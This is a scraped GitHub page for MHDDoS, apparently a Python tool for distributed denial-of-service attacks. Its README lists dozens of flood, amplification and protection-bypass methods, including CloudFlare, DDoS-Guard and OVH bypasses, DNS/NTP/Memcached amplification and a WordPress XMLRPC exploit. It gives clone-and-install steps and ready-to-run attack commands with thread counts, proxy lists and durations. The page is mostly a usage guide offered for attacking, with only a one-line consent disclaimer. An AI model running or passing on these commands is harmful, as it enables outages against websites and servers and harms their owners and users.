Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods
Go to file
MH_ProDev a6db42b929
Merge pull request #199 from PXEiYyMH8F/main
Forked for safety, fixed link, add instalation link, fix command
2022-03-06 20:29:28 +03:30
.github Update BOMBARDIER.md 2022-03-06 16:18:02 +00:00
files Update useragent.txt 2022-03-04 12:14:07 -08:00
.gitignore Fix gethostbyname crash 2022-03-01 13:01:25 +02:00
config.json changed logging system 2022-03-01 20:19:43 +03:30
Dockerfile add docker image building 2022-03-04 21:23:20 +02:00
LICENSE Create LICENSE 2022-02-16 01:38:27 +03:30
README.md Update README.md 2022-03-06 16:17:02 +00:00
requirements.txt Update requirements.txt 2022-03-05 17:34:31 +00:00
start.py fixed debug method layer4 2022-03-06 20:28:27 +03:30

aventium softworks

MHDDoS - DDoS Attack Script With 43 Methods

(Programming Language - Python 3)

MHDDoS forks MHDDoS last commit (main) MHDDoS Repo stars MHDDoS License MHDDoS issues

Please Don't Attack websites without the owners consent.

POWER

SCRIPT

Features And Methods

  • 💣 Layer7

    • get GET | GET Flood
    • post POST | POST Flood
    • ovh OVH | Bypass OVH
    • stress STRESS | Send HTTP Packet With High Byte
    • dyn DYN | A New Method With Random SubDomain
    • slow SLOW | Slowloris Old Method of DDoS
    • head HEAD | https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/HEAD
    • null NULL | Null UserAgent and ...
    • cookie COOKIE | Random Cookie PHP 'if (isset($_COOKIE))'
    • pps PPS | Only 'GET / HTTP/1.1\r\n\r\n'
    • even EVEN | GET Method with more header
    • googleshield GSB | Google Project Shield Bypass
    • DDoSGuard DGB | DDoS Guard Bypass
    • ArvanCloud AVB | Arvan Cloud Bypass
    • Google bot BOT | Like Google bot
    • Apache Webserver APACHE | Apache Expliot
    • wordpress expliot XMLRPC | WP XMLRPC expliot (add /xmlrpc.php)
    • CloudFlare CFB | CloudFlare Bypass
    • CloudFlare UnderAttack Mode CFBUAM | CloudFlare Under Attack Mode Bypass
    • bypass BYPASS | Bypass Normal AntiDDoS
    • bypass BOMB | Bypass with codesenberg/bombardier
  • 🧨 Layer4:

    • tcp TCP | TCP Flood Bypass
    • udp UDP | UDP Flood Bypass
    • syn SYN | SYN Flood
    • vse VSE | Send VSE Protocol
    • mem MEM | Memcached Amplification
    • ntp NTP | NTP Amplification
    • minecraft MINECRAFT | Minecraft Status Ping Protocol
    • dns DNS | DNS Amplification
    • chargen CHAR | Chargen Amplification
    • ard ARD | Apple Remote Desktop Amplification
    • rdp RDP | Remote Desktop Protocol Amplification
  • ⚙️ Tools - Run With python3 start.py tools

    • 🌟 CFIP | Find Real IP Address Of Websites Powered By Cloudflare
    • 🔪 DNS | Show DNS Records Of Sites
    • 📍 TSSRV | TeamSpeak SRV Resolver
    • ⚠ PING | PING Servers
    • 📌 CHECK | Check If Websites Status
    • 😎 DSTAT | That Shows Bytes Received, bytes Sent and their amount
  • 🎩 Other

    • STOP | STOP All Attacks
    • 🌠 TOOLS | Console Tools
    • 👑 HELP | Show Usage Script

Issues ?

Like the project? Leave a star on the repository!

Downloads

You can download it from GitHub Releases

Getting Started

Requirements


Videos

Toturial


Clone and Install Script

git clone https://github.com/MHProDev/MHDDoS.git
cd MHDDoS
pip install -r requirements.txt

Launch Script

  • Proxy Types:
Proxy Type Value
All Proxy 0
HTTP 1
SOCKS4 4
SOCKS5 5
RANDOM 6
  • Layer7 (Website):
# Running bypass attack from 101 threads, 
# with socks 5, 100 requests per proxy (connection), for 3600 seconds  
python start.py bypass https://example.com 5 101 socks5.txt 100 3600
# Running bomb attack from 50 threads (be careful must be < 300)
# with all proxies (0), 100 requests per proxy (connection), for 3600 seconds
python start.py bomb https://example.com 0 50 proxy.txt 100 3600
  • Layer4 (Server/Home):
# Running udp attack from 1 threads, for 3600 seconds  
python start.py udp 1.1.1.1:53 1 3600
# Running dns attack from 100 threads, for 3600 seconds  
# with reflector servers from dns.txt, for 3600 seconds  
python start.py dns 1.1.1.1:53 100 3600 dns.txt
# Running dns attack from 1000 threads
# with socks 5, for 3600 seconds  
python start.py minecraft 1.1.1.1:53 1000 3600 5 socks5.txt
  • Debug Mode (Log Attack status):
python start.py bypass https://example.com 5 1000 socks5.txt 100 100 true
python start.py udp 1.1.1.1:53 1 100 true
python start.py dns 1.1.1.1:53 1 100 dns.txt true
python start.py minecraft 1.1.1.1:53 1 100 5 socks5.txt true
  • Tools/Help:
python start.py tools
python start.py help

💰 Donation Links: